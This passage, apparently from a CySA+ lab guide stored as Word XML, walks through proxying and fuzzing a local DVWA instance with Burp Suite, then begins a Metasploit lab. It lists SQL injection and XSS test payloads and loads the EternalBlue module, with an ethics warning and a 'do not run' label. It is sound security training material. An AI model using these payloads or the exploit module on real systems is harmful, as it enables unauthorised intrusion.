      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>6: Denial of service (use with caution)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>9: SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Install Burp Suite Community on your own laptop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Download: https://portswigger.net/burp/communitydownload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(Windows / macOS / Linux). It is a Java GUI — install Java 17+ if missing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Configure your browser to use Burp's proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Launch Burp → Temporary project → Use Burp defaults.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proxy → Proxy Settings → confirm listener on 127.0.0.1:8080 (or change to 8081 to avoid clashing with DVWA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In Firefox / Chrome, point HTTP and HTTPS proxy to 127.0.0.1:8081.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Visit http://burp and install the Burp CA so HTTPS interception works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Intercept and modify a request (the killer Burp workflow)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Proxy → Intercept ON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Browse to DVWA's login page and submit admin / wrong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The captured request appears in Burp. Right-click → Send to Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In Repeater change the password to password and click Send.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You see the auth response without retyping anything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This intercept/modify/replay loop is how analysts manually verify XSS, SQLi, IDOR, and CSRF findings flagged by automated scanners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Send to Intruder for fuzzing (Community is rate-limited but functional)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Right-click a request → Send to Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mark a parameter (e.g. the id of a product page) as the payload position.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Payloads → Simple list → paste 1, 2, 3, ' OR 1=1--, &lt;script&gt;alert(1)&lt;/script&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Start attack — Burp replays each payload and shows length/status differences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Differences in response length are the classic signal of a successful injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Combine Nikto + Burp into a single workflow</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Quick automated baseline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Deep crawl + scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OWASP ZAP (Lab 13)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Manual verification &amp; exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Burp Suite Repeater / Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Report writeup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4752"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Markdown → Lab 26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 9 — Tear down</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>docker stop dvwa &amp;&amp; docker rm dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run a Nikto scan and read its prefixed OSVDB/CVE references.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Install Burp Suite Community and route browser traffic through it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Intercept, modify, and replay HTTP requests with Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fuzz a parameter with Intruder and interpret length/status diff.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to run a Nikto scan and read its prefixed OSVDB/CVE references.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 15 — Metasploit Framework Basics</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use the Metasploit Framework (MSF) as an analyst — not to break systems but to validate that a vulnerability scanner finding is actually exploitable, which is the heart of CySA+ 2.3 (Validation — true positive/negative, Exploitability/weaponization) and 2.2 (Multipurpose — MSF, Nmap, Recon-ng).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will use the Metasploit Framework (MSF) as an analyst — not to break systems but to validate that a vulnerability scanner finding is actually exploitable, which is the heart of CySA+ 2.3 (Validation — true positive/negative, Exploitability/weaponization) and 2.2 (Multipurpose — MSF, Nmap, Recon-ng).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; Ethics: Only run exploits against systems you own or have explicit written permission to test. The free Metasploitable 2/3 VM (https://github.com/rapid7/metasploitable3) is the standard legal target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="1871688"/>
            <wp:docPr id="12" name="Picture 12"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_2b6565e960.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="1871688"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y metasploit-framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>msfdb init sets up the Postgres backend so search and host tracking work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Launch the console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-q skips the banner. You are now at the msf6 &gt; prompt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Search for an exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Imagine your OpenVAS report flagged EternalBlue (CVE-2017-0144) on a Windows host. In msfconsole:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; search eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; info exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>search shows every matching module. info displays required options, payloads, targets, and references — including the CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Configure and stage (do not run — analyst view)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 exploit(...) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
